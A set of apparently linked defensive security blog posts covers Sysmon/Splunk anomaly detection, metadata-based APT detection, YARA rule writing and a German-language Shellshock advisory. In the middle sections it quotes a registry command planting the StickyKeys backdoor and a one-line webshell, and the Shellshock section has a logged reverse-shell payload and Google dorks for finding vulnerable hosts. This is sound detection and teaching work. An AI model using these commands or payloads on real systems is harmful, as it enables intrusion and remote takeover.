In recent years “anomaly detection” has often been used as marketing buzzword and as a result lost some of its shine. I am still a strong believer and often phrase sentences like “anomaly detection is the only method to detect yet unknown threats”. In security monitoring we call it anomaly detection, Antivirus vendors call it heuristics and SPAM appliances evaluate it in a “X-Spam-Score”.

Anomaly detection requires the ability to describe what is normal and exclude it from the evaluation.

With the data collected from the different Sysmon sources, this is an easy task to do. Sysmon provides the executable hash as MD5, SHA1 or SHA256 in the log entries that enables an analyst to identify the few different versions of a certain system executable. A hash of a system program like “cmd.exe” executed on the different systems on your domain should always be the same on all systems running the same version of Windows. But let me give you some examples.
A sane system environment analysis for the “cmd.exe” would look like this:

Hash - Image - Count
3C77C39347A6FA560A74587B0498FE84 - C:\WINDOWS\system32\cmd.exe - 56
AD7B9C14083B52BC532FBA5948342B98 - C:\Windows\System32\cmd.exe - 34

The following analysis includes an anomaly, which is worth to be investigated:

Hash - Image - Count
3C77C39347A6FA560A74587B0498FE84 - C:\WINDOWS\system32\cmd.exe - 56
AD7B9C14083B52BC532FBA5948342B98 - C:\Windows\System32\cmd.exe - 34
D8B7B276710127D233ABCDB7313AAC36 - C:\WINDOWS\system32\cmd.exe - 1

Let’s take a look at two analysis examples in which I use this method to identify different anomalies.

Anomaly 1: “StickyKeys” backdoor and the like

I use my favorite log analysis system for the analysis, which is Splunk. Getting the Sysmon data into splunk is easy as there is already a Sysmon Add-on available in the App Store. Just use the deployment manager to push the Add-on to the Splunk Forwarders and install Sysmon. (see my other blog post on Sysmon for more appropriate configuration options)
Then you can do things like that:

SOURCE="WinEventLog:Microsoft-Windows-Sysmon/Operational" NOT Image=*Sysmon.exe | dedup host,Image | stats distinct_count(Image) AS different_names,VALUES(Image),VALUES(host) BY Hash | sort -different_names

It gives you an overview of files with the same hash but different names. It is pretty easy to spot the manipulation.

StickyKey Backdoor Detection with Splunk

StickyKey Backdoor Detection with Splunk and Sysmon


We detected a so called “StickyKeys” backdoor, which is a system’s own “cmd.exe” copied over the “sethc.exe”, which is located in the same folder and provides the Sticky Keys functionality right in the login screen. Replacing it with a system command line establishes a shell running as LOCAL_SYSTEM that pops up when you RDP to a server and press 5 times shift consecutively. (see this blog post for more information on this backdoor)

Anomaly 2: The Black Sheep

If you create the statistics by “Image” instead of “Hash” you’ll get an overview of the different versions of system files in use and are able to identify system file versions that are unique.
Look at the following example to get an impression what can be done with this method.

SOURCE="WinEventLog:Microsoft-Windows-Sysmon/Operational" NOT Image=*Sysmon.exe | dedup host,Image | rex FIELD=Image "(?<executable>[^\\\]+)$" | eval Executable=LOWER(Executable) | stats COUNT BY Executable,Hash | sort +COUNT

I am sorry but I can’t give you a nice screenshot on what would it look like in a big environment. These are the results from 3 different demo systems only (Win2003, Win7 and Win8), but in order to see what it would look like in a environment with hundreds or thousands of systems, see the listing below.

Sysmon Detection Splunk

Sysmon Anomaly Detection with Splunk


The result would look like this:

Hash - Image - Count
AD7B9C14083B52BC532FBA5948342B98 - cmd.exe - 1480
3C77C39347A6FA560A74587B0498FE84 - cmd.exe - 256
D8B7B276710127D233ABCDB7313AAC36 - cmd.exe - 2

Consider the image files with a low count as anomalies and try to figure out, why the hash of the system executable is different from the variants on the other systems.
I would google the hash of the black sheep, which is “D8B7B276710127D233ABCDB7313AAC36” and see if I can get more details. An empty google result is NOT a good sign as some may be inclined to believe. If the google results are ambiguous you should try to figure out if these systems are somehow special – e.g. certain readout system on embedded OS versions, systems that do not receive patches. If the findings are still suspicious you should drop the samples in a sandbox and see how they behave.
Hope you liked it. Please give me feedback if you actually tested this method in your environment so that I can improve the search statements or handle false positive conditions.

APT Detection is About Metadata

People often ask me, why we changed the name of our scanner from “IOC” to “APT” scanner and if we did that only for marketing reasons. But don’t worry, this blog post is just as little a sales pitch as it is an attempt to create a new product class.
I’ll show you why APT detection is difficult – for the big players and spirited newcomers like us.

Metadata is the Key

Only recently I recognized and named the methods that we apply since we introduced the scoring system in our scanner product. Instead of looking at a file only by its content we collect numerous attributes and evaluate a score based on certain rules that indicate conspicuous features or anomalies.
What I recognized was that Metadata is the key to successful APT detection. Let me give you some examples.

The “Sticky Keys” Backdoor

During our investigations we found that the attackers used a simple backdoor that allowed them to avoid AV detection and use tools that were already available on the target systems. What they did was to copy a valid “cmd.exe” over the “sethc.exe” in the System32 folder in order to establish a backdoor that waits for the user pressing five times shift consecutively on a RDP logon screen and pops up a Windows command line running as LOCAL_SYSTEM. Another method sets the Windows command line as debugger for the stickykeys binary.

wmic /user:username /password:secret /node:system1 process call create
"C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\sethc.exe"
/v "
Debugger" /t REG_SZ /d "cmd.exe" /f"

With the necessary rights it is easy to install and difficult to detect.

StickyKeys Backdoor APT

APT Detection StickyKeys Backdoor


As I already said, an Antivirus engine won’t detect this backdoor as the content of the file is a valid Windows executable with an intact signature. Windows 7+ users won’t stumble over it as they have Network Level Authentication (NLA) enabled by default, which prompts the user for username and password before fully establishing a Terminal Services connection. Attackers modify their local “default.rdp” file and add “enablecredSSPsupport:i:0:1” in order to disable this behaviour.
APT detection therefore means the following:

  • Check system files like the stickykey binary for modifications – not by comparing MD5 hashes from whitelist databases like the NSRL, but by comparing the expected content for a certain file name with the actual content of the file. I described this method in a blog article and Chad Tilbury from Crowdstrike described how to apply this method using their CrowdResponse tool.
  • Identify “default.rdp” files on server systems that have NLA disabled. (Administrators shouldn’t do that)
  • Check if the Windows command line (cmd.exe) is registered as a debugger for any program

PsExec’s Evil Clone

I often use the example of the well-known Sysinternals tool “PsExec”, which is likewise used by administrators and APT groups. It doesn’t make much sense adding it to the indicators of compromise (IOCs) of your triage sweep although it may have played a substantial role in lateral attacker movement.
The human eye is able to distinguish between a PsExec that has been used for administration and a PsExec that has been used by the attackers. The essential difference, which enables us to distinguish between both versions does not lie in the content of the file but the Metadata.
Look at the following table and tell me which of both files is valid and which has been placed on the system by the attackers. Remember, the file content is the same – a MD5 hash of both files is equal.

File 1 File 2
MD5 aeee996fd3484f28e5cd85fe26b6bdcd aeee996fd3484f28e5cd85fe26b6bdcd
Filename PsExec.exe p.exe
Path C:\SysInternals C:\TEMP
Owner Administrators LOCAL_SYSTEM
Modified Time Stamp 2013-02-10 09:22:04 1970-01-01 00:00:00

It is not that difficult, isn’t it?
APT detection therefore means the following:

  • Imitating the human point of view by pulling together all Metadata connected with an element, be it a file, a process or eventlog message and evaluate the legitimacy of the element based on all available Metadata attributes

The Simplest Webshell

We often encounter so-called webshells that were placed in web server directories to establish a simple backdoor. Webshells can be very specific and therefore easy to detect. The C99 webshell is a good example for a PHP webshell, JspSpy is a well-known JSP webshell. Both are easily detected, even by Antivirus engines (see: C99 on VT, JSPSpy on VT).
However, APT groups tend to use two different types of webshells:

  • Tiny webshells
  • Code snippets with certain functions copied from legitimate software

There are a lot of well-known tiny webshells. The following one is my favorite. Add a space or change the request parameter “abc” to something else and the detection ratio is alarmingly low (Example). It allows an attacker to evaluate (execute) an arbitrary command on the web server. There are numerous blog posts and other articles describing what can be done with a webshell like this. However, the protection level provided by AV engines, firewalls and NIDS is almost zero.

<%eval request("abc")%>

Another method we discovered was the use code snippets copied from blog entries or tutorial pages that allowed them to use only certain functions like “file upload” or “directory listing”.
They often use a weakness in web applications to upload and run their own scripts or even whole application containers (.war). By placing a known webshell like the JspSpy webshell into that web server folder, they would run the risk of being detected. What they really need is a distribution point for their toolset or a simple tool to execute code on the server (like a tiny webshell). We’ve seen simple upload scripts that provide nothing more than a upload function, which they use to store their toolsets for lateral movement. A google search for “upload jsp” revealed various scripts they used in their attacks. It’s obvious that AV engines won’t detect this type of threat. How could they? The attackers abuse benign pieces of code to establish malicious backdoors.
APT detection therefore means the following:

  • Use the Metadata like file size, creation timestamp, file extension in combination with generic content detection rules – e.g. check for the string “eval” in a file smaller 40 byte and a script extension like “.jsp”.
  • Check the content of upload directories for the expected file types (and don’t use the extension to determine the file type)
  • Check web server processes for executables running in the web server directories – e.g. curl.exe in D:\Inetpub\wwwroot
  • Generate and send frequent reports on modified files within the web server directories

The Heavy Burden of Definite Detection

One could be tempted to believe that I wrote this article in order to degrade Antivirus engines, but this isn’t the case. Antivirus solutions are still play a key role and carry the heavy burden of definite detection. Their scan result has to be “thumbs up” or “thumbs down” as there is no middle ground.
Years ago they introduced signatures to detect “Potentially Unwanted Applications” (PUA). Users or administrators decide on what to do if one of these “dual use” tools has been found on a system. Handling thousands of the events generated by the Antivirus agents is a difficult task, even with a central console or SIEM integrated log files. It is easy to understand why PUA events do not play an important role in view of dozens of Trojan detections per day.

APT detection is the art of suspicion. A missing “stickykeys” string in the “sethc.exe” indicates a manipulation, a replaced system file. It is not a definite detection but the certainty that something is wrong.

Conclusion

Considering the given examples an attentive reader may be inclined to believe that Antivirus and simple IOC scanning (Triage) is not enough to defend against Advanced Persistent Threats. After the experiences of the last 3 years I have to confirm that assumption.
Who would recognize and report the execution of a “sethc.exe” on a server system, the “PUA/PsExec” message generate by the Antivirus or another JSP file on the web server?
I even doubt that so-called “APT solutions” are able to detect

  • a “.war”-file upload to a Tomcat server by the use of “tomcat/tomcat” as credentials,
  • encrypted file uploads,
  • lateral movement using PsExec, Powershell or WMIC and
  • “StickyKey” backdoor access via RDP.

An extensive security monitoring in form of a SIEM system allows you to detect a needle in the haystack but only if you are able to distinguish between straw and needles.

The question is: How can I define such soft indicators to detect the described anomalies? The OpenIOC framework already contains options to combine certain characteristics like filename and filesize, but rather than using it as a tool to describe anomalies it is often used to tighten the detection to the level of a hash value. I prefer hash values over “Name:PsExec.exe” combined with “Filesize:381816” because it doesn’t make you believe that you’re looking at a clever rule.
I therefore recommend the following:

  1. Assume compromise and start from there
    Ask yourself: How would I detect a breach? What if attackers already took control of the Windows Domain and worked with domain admin accounts? What if they worked with tools that my Antivirus is unable to detect?
  2. Use all Metadata you can get to determine the legitimacy of an element
    This does no only apply to files or processes in APT and IOC scanning, but also to the discipline of security monitoring.E.g. Select interesting Antivirus events based on various characteristics and not only the status that indicates if the malware has be removed or not. Consider the location of the malware (Temporary Internet files or System32 folder), the user account (Restricted user, Administrator or LOCAL_SYSTEM), the malware type (JS/Redirector or PUA/PasswordDump), system type (server or client workstation), detection time (02:00am with noone working in the night shift), detected form (in a RAR archive or extracted). Develop similar schemes for other log types. The most interesting ones are Antivirus, Proxy and Windows logs.
    Useful Links:
    SysForensics published an article about process anomaly detection, which was adapted to other OS versions and included in our THOR APT Scanner and my LOKI IOC Scanner.
    Use SysInternals Sysmon to enrich you Windows log data.
  3. Don’t create detection rules that are too tight but concentrate on filtering the false positives
    If you regard filtering false positives as a pain in the neck you’re probably using the wrong SIEM system. (Warning – product placement: I prefer Splunk over all others, especially with the Enterprise Security App installed)
  4. Use IOCs from published APT reports to enrich your detection rules
    We use the APT reports to create new rules in our customer’s SIEM systems and as input for our APT scanner THOR.Useful Links:
    APT Notes is a IOC repository with hundreds of reports from the last years. You can download the github repository from here.
How to Write Simple but Sound Yara Rules

How to Write Simple but Sound Yara Rules

During the last 2 years I wrote approximately 2000 Yara rules based on samples found during our incident response investigations. A lot of security professionals noticed that Yara provides an easy and effective way to write custom rules based on strings or byte sequences found in their samples and allows them as end user to create their own detection tools.
However it makes me sad to see that there are mainly two types of rules published by the researchers:

  1. rules that generate many false positives and
  2. rules that match only the specific sample and are not much better than a hash value.

I therefore decided to write an article on how to build optimal Yara rules, which can be used to scan single samples uploaded to a sandbox and whole file systems with a minimal chance of false positives.
These rules are based on contained strings and easy to comprehend. You do not need to understand the reverse engineering of executables and I decided to avoid the new Yara modules like “pe” which I still consider as “testing” features that may lead to memory leaks or other errors when used in practice.

Automatic Rule Generation

First I believed that automatically generated rules can never be as good as manually created ones. During my work for out IOC scanners THOR and LOKI I had to create hundreds of Yara rules manually and it became clear that there is an obvious disadvantage. What I used to do was to extract UNICODE and ASCII strings from my samples by the following commands:

strings -el samples.exe
strings -a sample.exe

I prefer the UNICODE strings as they are often overlooked and less frequently changed within a certain malware/tool family. Make sure that you use UNICODE strings with the “wide” keyword and ASCII strings with the “ascii” keyword in your rules and use “fullword” if there is a word boundary before and after the string. The problem with this method is that you cannot decide if the string that is returned by the commands is unique for this malware or often used in goodware samples as well.
Look at the extracted strings in the following example:

NTLMSSP
%d.%d.%d.%d
%s\IPC$
\\%s
NT LM 0.12
%s%s%s
%s.exe %s
%s\Admin$\%s.exe
RtlUpcaseUnicodeStringToOemString
LoadLibrary( NTDLL.DLL ) Error:%d

Could you be sure that the string “NT LM 0.12” is a unique one, which is not used by legitimate software?
To accomplish this task for me I developed “yarGen“, a Yara rule generator that ships with a huge string database of common and benign software. I used the Windows system folder files of Windows 2003, Windows 7 and Windows 2008 R2 server, typical software like Microsoft Office, 7zip, Firefox, Chrome, Cygwin and various Antivirus solution program folders to generate the database. yarGen allows you to generate your own database or add folders with more goodware to the existing database.
yarGen extracts all ASCII and UNICODE strings from a sample and removes all strings that do also appear in the goodware string database. Then it evaluates and scores every string by using fuzzy regular expressions and the “Gibberish Detector” that allows yarGen to detect and prefer real language over character chains without meaning. The top 20 of the strings will be integrated in the resulting rule.
Let’s look at two examples from my work. A sample of the Enfal Trojan and a SMB Worm sample.
yarGen generates the following rule for the Enfal Trojan sample:

rule Enfal_Generic {
meta:
description = "Auto-generated rule - from 3 different files"
author = "YarGen Rule Generator"
reference = "not set"
date = "2015/02/15"
super_rule = 1
hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
strings:
$s0 = "urlmon" fullword
$s1 = "Registered trademarks and service marks are the property of their respec" wide
$s2 = "Micorsoft Corportation" fullword wide
$s3 = "IM Monnitor Service" fullword wide
$s4 = "imemonsvc.dll" fullword wide
$s5 = "iphlpsvc.tmp" fullword
$s6 = "XpsUnregisterServer" fullword
$s7 = "XpsRegisterServer" fullword
$s8 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
$s9 = "tEHt;HuD" fullword
$s10 = "6.0.4.1624" fullword wide
$s11 = "#*8;-&gt;)" fullword
$s12 = "%/&gt;#?#*8" fullword
$s13 = "\\%04x%04x\" fullword
$s14 = "
3,8,18" fullword
$s15 = "
3,4,15" fullword
$s16 = "
3,7,12" fullword
$s17 = "
3,4,13" fullword
$s18 = "
3,8,12" fullword
$s19 = "
3,8,15" fullword
$s20 = "
3,6,12" fullword
condition:
all of them
}

The resulting string set contains many useful strings but also random ASCII characters ($s9, $s11, $s12) that do match on the given sample but are less likely to produce the same result on other samples of the family.
yarGen generates the following rule for the SMB Worm sample:

rule sig_smb {
meta:
description = "Auto-generated rule - file smb.exe"
author = "YarGen Rule Generator"
reference = "not set"
date = "2015/02/15"
hash = "db6cae5734e433b195d8fc3252cbe58469e42bf3"
strings:
$s0 = "LoadLibrary( NTDLL.DLL ) Error:%d" fullword ascii
$s1 = "SetServiceStatus failed, error code = %d" fullword ascii
$s2 = "%s\\Admin$\\%s.exe" fullword ascii
$s3 = "%s.exe %s" fullword ascii
$s4 = "iloveyou" fullword ascii
$s5 = "Microsoft@ Windows@ Operating System" fullword wide
$s6 = "\\svchost.exe" fullword ascii
$s7 = "secret" fullword ascii
$s8 = "SVCH0ST.EXE" fullword wide
$s9 = "msvcrt.bat" fullword ascii
$s10 = "Hello123" fullword ascii
$s11 = "princess" fullword ascii
$s12 = "Password123" fullword ascii
$s13 = "Password1" fullword ascii
$s14 = "config.dat" fullword ascii
$s15 = "sunshine" fullword ascii
$s16 = "password &lt;=14" fullword ascii
$s17 = "del /a %1" fullword ascii
$s18 = "del /a %0" fullword ascii
$s19 = "result.dat" fullword ascii
$s20 = "training" fullword ascii
condition:
all of them
}

The resulting rules are good enough to use them as they are, but they are far from an optimal solution. However it is good that so many strings have been found, which do not appear in the analyzed goodware samples.
If you don’t want to use or download yarGen, you could also use the online tool Yara Rule Generator provided by Joe Security, which was inspired by/based on yarGen.
It is not necessary to use a generator if your eye is trained and experienced. In this case just read the next section and select the strings to match the requirements of the (what I call) sufficiently generic Yara rules.

Sufficiently Generic Yara Rules

As I said in the introduction rules that generate false positives are pretty annoying. However the real tragedy is that most of the rules are far too specific to match on more than one sample and are therefore almost as useful as a file hash.
What I tend to do with the rules is to check all the strings and put them into at least 2 different categories:

  • Very specific strings = hard indicators for a malicious sample
  • Rare strings = likely that they do not appear in goodware samples, but possible
  • Strings that look common = (Optional) e.g. yarGen output strings that do not seem to be specific but didn’t appear in the goodware string database

Check out the modified rules in order to understand this splitting. Ignore the definition named $mz, I’ll explain it later and look at the string definitions below.
The definitions starting with $s contain the very specific strings, which I regard as so special that they would not appear in legitimate software. Note the typos in both strings: “Micorsoft Corportation” instead of “Microsoft Corporation” and “Monnitor” instead of “Monitor”.
The strings starting with $x seem to be special (I tend to google the strings) but I cannot say if they also appear in legitimate software. The definitions starting with $z seem to be ordinary but have not been part of the goodware string database so they have to be special in some way.

rule Enfal_Malware_Backdoor {
meta:
description = "Generic Rule to detect the Enfal Malware"
author = "Florian Roth"
date = "2015/02/10"
super_rule = 1
hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
strings:
$mz = { 4d 5a }
$s1 = "Micorsoft Corportation" fullword wide
$s2 = "IM Monnitor Service" fullword wide
$x1 = "imemonsvc.dll" fullword wide
$x2 = "iphlpsvc.tmp" fullword
$x3 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
$z1 = "urlmon" fullword
$z2 = "Registered trademarks and service marks are the property of their" wide
$z3 = "XpsUnregisterServer" fullword
$z4 = "XpsRegisterServer" fullword
condition:
( $mz at 0 ) and
(
( 1 of ($s*) ) or
( 2 of ($x*) and all of ($z*) )
)
and filesize &lt; 40000
}

Now check the condition statement and notice that I combine the rules with a magic header of an executable defined by $mz and a file size to exclude typical false positives like Antivirus signature files, browser cache or dictionary files. Set an ample file size value to avoid false negatives. (e.g. samples between 100K and 200K => set file size < 300K)
You can see that I decided that a single occurrence of one of the very specific strings would trigger that rule. ( 1 of $s* )
Than I combine a bunch of less unique strings with most or all of the ordinary looking strings. ( 2 of $x* and all of $z* )
Let’s look at second example. (see below)
$s1 is a very special string with string formatting placeholders “%s” in combination with an Admin$ share. $s2 seems to be the typical “svchost.exe” but contains the number “0” instead of an “O”, which is very uncommon and a clear indicator for something malicious.
All the definitions starting with $a are special but I cannot say for sure if they won’t appear in legitimate software. The strings defined by $x seem ordinary but were produced by yarGen, which means that they did not appear in the goodware string database.
This special example contains a list of typical passwords which is defined by $z1..z8.

rule SMB_Worm_Tool_Generic {
meta:
description = "Generic SMB Worm/Malware Signature"
author = "Florian Roth"
reference = "http://goo.gl/N3zx1m"
date = "2015/02/08"
hash = "db6cae5734e433b195d8fc3252cbe58469e42bf3"
strings:
$mz = { 4d 5a }
$s1 = "%s\\Admin$\\%s.exe" fullword ascii
$s2 = "SVCH0ST.EXE" fullword wide
$a1 = "LoadLibrary( NTDLL.DLL ) Error:%d" fullword ascii
$a2 = "\\svchost.exe" fullword ascii
$a3 = "msvcrt.bat" fullword ascii
$a4 = "Microsoft@ Windows@ Operating System" fullword wide
$x1 = "%s.exe %s" fullword ascii
$x2 = "password &lt;=14" fullword ascii
$x3 = "del /a %1" fullword ascii
$x4 = "del /a %0" fullword ascii
$x5 = "SetServiceStatus failed, error code = %d" fullword ascii
$z1 = "secret" fullword ascii
$z2 = "Hello123" fullword ascii
$z3 = "princess" fullword ascii
$z4 = "Password123" fullword ascii
$z5 = "Password1" fullword ascii
$z6 = "sunshine" fullword ascii
$z7 = "training" fullword ascii
$z8 = "iloveyou" fullword ascii
condition:
$mz at 0 and
( 1 of ($s*) and 1 of ($x*) ) or
( all of ($a*) and 2 of ($x*) ) or
( 5 of ($z*) and 2 of ($x*) ) and
filesize &lt; 200000
}

You see that I combined the string definitions in a similar way as before. This method in combination with the magic header and the file size should be a good starting point for the final stage – testing.

Testing

Testing the rules is very important. It seems that most authors decide that the rules are good enough if they match on the given samples.
You should definitely do the following checks:

  1. Scan the malware samples
  2. Scan a big goodware archive

To carry out the tests download the Yara scanner and run it from the command line. The goodware directory should include system files from various Windows versions, typical software and possible false positive sources (e.g. typical CMS software if you wrote Yara rules that match on malicious web shells)

Yara Rule Testing

Yara Rule Testing on Samples and Goodware


If the rule matched on the malicious samples and did not generate a match on the goodware archive your rule is good enough to test the rule in practice.

Update

Make sure to check Part 2 of “How to Write Simple and Sound YARA Rules”.

Bash Schwachstelle CVE-2014-6271 Shell Shock erkennen

CVE-2014-6271 Bash Shell Shock

Shell Shock Logo – Bild: Paul M. Gerhardt


Dieser Artikel enthält Information dazu, wie Sie die bash Schwachstelle CVE-2014-6271 Shell Shock erkennen und behandeln können.

Betroffene Systeme

Grundsätzlich sind alle Systeme betroffen, die eine “bash” einsetzen, also

  • Linux
  • Unix
  • AIX
  • Solaris
  • HPUX
  • D.h. auch viele Embedded Systems, Network Devices, Appliances

Die Remote Ausnutzung der Schwachstelle bedarf aber eines remote erreichbaren Dienstes, der in einer bestimmten Form Gebrauch von der Bash macht. Aus unserer Sicht stehen besonders all jene Systeme im Fokus , die eine simple Web Applikation anbieten oder eine Web Applikation, die systemnahe Befehle ausführt.
Beispiele:

  • Druckserver
  • Video-Kameras
  • Haustechnik
  • Anzeigesysteme
  • ILO Boards
  • ICS und SCADA Systeme
  • Appliances (proprietär mit Web Interface und reduziertem Remote Zugang)
  • Usw.

Aber auch jegliche einfache Web Applikation, die “popen()” oder “system()” calls verwendet. Auch finden sich des öfteren aktive Skripts in “cgi-bin” Ordnern, die entweder in Perl oder anderen eher empfindlichen Sprachen verfasst sind.
Große Web Frameworks wie CMS Systeme, J2EE oder Web Sphere sind mit hoher Wahrscheinlichkeit nicht verwundbar.

Kritikalität

Auch wenn der Angriffsvektor vielfältig ist und es keinen einfachen Weg der Erkennung von anfälligen Anwendung gibt, ist das Schadenspotential erheblich. Diese Einschätzung liegt darin begründet, dass wenn eine verwundbare Applikation gefunden wird, das dazugehörige Exploit extrem simpel anzuwenden sein wird. Es kann ein einfacher URL Aufruf oder eine “curl” Kommandozeile sein, die zur Ausnutzung der Schwachstelle benötigt wird.
Das Schadenspotential des Angriffs ist im Gegensatz zu Heartbleed auch deshalb enorm, weil der Angreifer den schadhaften Code direkt unter dem Benutzer des verwundbaren Dienstes ausführen kann und im schlimmsten Fall das System direkt komplett übernommen wird. Das ermöglicht auch die Entwicklung von Würmern, die gezielt die bereits bekannten Schwachstellen diverser Produkte ausnutzt und sich dann über diese Geräte verbreitet.
Die große Schwierigkeit besteht dann darin, solche “neuartigen” Würmer effizient und koordiniert zu entfernen, denn Appliances, Haustechnik und andere Embedded Devices stellten Sicherheitsorganisationen in der Vergangenheit bereits bei Würmern im Windows Umfeld vor große Herausforderungen.
Vektor: Vielfältig
Schaden: Hoch
Komplexität: Niedrig
Remote ausnutzbar: Ja (wenn remote angebotener Dienst bash Funktionen nutzt)

Erkennung

Das Problem mit dieser Schwachstelle ist, dass es keinen klaren Check oder Indikator auf Systemebene geben kann, denn die Schwachstelle ist nicht auf ein einzelnes verwundbares Skript oder Produkt beschränkt. Selbst die Ausnutzung über das DHCP Protokoll wurde bereits in einem POC demonstriert.
Verwundbare Skripte und Applikationen könnten in allen möglichen Produkten stecken.

Netzwerkebene

Die einzig sinnvolle Lösung ist derzeit die Erkennung im Netzwerkverkehr mittels IDS/IPS Systemen, die schadhafte Anfragen im HTTP Datenstrom oder anderen Protokollen an Hand von Signaturen erkennen und nötigenfalls die Verbindung direkt blocken können, wenn sie “inline” betrieben werden.

Systemebene

Eine Erkennung auf Systemebene ist nur schwer möglich, da die schadhaften Codes in die Umgebungsvariablen des Benutzers injiziert werden, unter dessen Konto der ausgenutzte Dienst läuft. Die Codes sind also nur im Speicher des Systems vorhanden.
Das System Diagnose Werkzeug “sysdig” hat bereits eine Lösung integriert, allerdings ist sie nur für die Überwachung von Einzelsystemen geeignet und bedarf noch aufwändiger Zusatzarbeiten, um die von Sysdig generierten Outputs zentral in ein Security Monitoring zu integrieren.
Wenn Apache Access Logs in einem Security Monitoring (SIEM) zusammengeführt werden, lohnt es sich diese Logfiles zu überwachen. Die Zeilen eines Angriffs und der derzeit bekannten Würmer sehen folgendermaßen aus (im Listing wird die Injection über den User-Agent String vorgenommen, der naütrlich im Log Format definiert sein muss):

213.5.67.223 - - [26/Sep/2014:10:37:34 +0200] "GET /cgi-bin/poc.cgi HTTP/1.1" 200 1066 "-" "() { :; }; /bin/nc -e /bin/sh 213.5.67.223 4444 &”

Eine Suche nach folgendem Regex in den Access Logs, kann schadhafte Request sichtbar machen:

\(\)\s\{.*;\s*\};

Verwundbarkeit feststellen

Um zu testen, ob die Bash eines Systems überhaupt verwundbar wäre, wenn ein angreifer von außen Codes injizieren kann, eignet sich folgender Aufruf:

env x='() { :;}; echo vulnerable' bash -c 'echo hello'

Wenn die Bash verwundbar ist, wird ein “vulnerable” ausgegeben”, ansonsten wird ein Fehler angezeigt.

Schutzmöglichkeiten

Patching

Diverse Hersteller von Linux Distributionen bieten bereits Patche an. Da viele der sofort bereitgestellten Patches keine Wirkung hatten, wurde ein neuer CVE-2014-7169 geöffnet, um die zwar gepatche aber dennoch verwundbare Bash Thematik zu behandeln. Diese CVE Nummer sollte also ebenso im Auge behalten werden.

Blocking via IPS / WAF

Wie oben bereits beschrieben, sehen wir die einzig derzeit verfügbare Schutzfunktion in IDS/IPS Systemen und WAFs. (Web Application Firewalls)
Sowohl die Open Source Lösungen Snort und Bro als auch professionelle IDS Systeme stehen Signaturen bereit, die bei einem “inline” installierten System auf “blocking” konfiguriert werden können. Die derzeitigen Angriffe gegen Webserver sind im Netzwerktraffic klar erkennbar und gut mit Regulären Ausdrücken kenntlich zu machen bzw. in Signaturen zu definieren.

Google Dorks

Mit Hilfe dieser Google Suchen können verwundbare Zielsysteme gefunden werden.

inurl:cgi-bin “GATEWAY_INTERFACE = CGI”
inurl:”server-status”  intitle:apache “cgi-bin”
sitemap.xml filetype:xml intext:”cgi-bin”
filetype:sh inurl:cgi-bin

Weitere Informationen

Informationen von Rapid7 (Metasploit)
Shell Shock Meldung auf Heise
Beispiele für die Ausnutzung der Schwachstelle

Auf dem Laufenden bleiben

Heise Security berichtet ausgiebig über die “Shell Shock” Schwachstelle.
http://www.heise.de/security/suche/?q=ShellShock&rm=search
Wir empfehlen auch den Twitter Stream zur Suche “CVE-2014-6271”.
https://twitter.com/search?q=CVE-2014-6271